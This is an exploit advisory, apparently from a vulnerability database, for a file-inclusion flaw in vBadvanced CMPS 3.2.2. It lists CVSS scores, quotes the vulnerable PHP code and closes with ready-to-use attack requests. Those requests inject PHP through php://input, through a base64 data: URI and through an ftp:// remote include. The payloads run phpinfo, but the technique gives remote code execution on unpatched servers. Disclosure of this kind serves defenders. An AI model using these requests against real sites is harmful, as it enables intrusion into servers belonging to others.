vBadvanced CMPS 3.2.2 Local File Inclusion / Remote File Inclusion

2012-01-26 / 2012-10-02
Credit: PacketiK
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: vBadvanced CMPS <= v3.2.2 [RFI/LFI] # Date: 25.01.2012 # Author: PacketiK email: packeto[dog]mail[dot]ru icq: 555555555 and Ulitochka =P # Software Link: http://www.vbadvanced.com/ # Version: v3.2.2 #Requirements: register_globals = on file: vba_cmps_include_bottom.php vuln_code: // Process PHP file pages here to avoid having to globalize variables if ($pages['type'] == 'php_file' AND $vba_cusmodid) { ob_start(); require($pages['template']); $home[$vba_cusmodid]['content'] = ob_get_contents(); ob_end_clean(); } Mini_exploits: need: allow_url_include = On POST http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=php://input HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 38 <?php phpinfo();ob_end_flush();exit;?> Or http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4= Or http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt

References:

http://www.vbadvanced.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top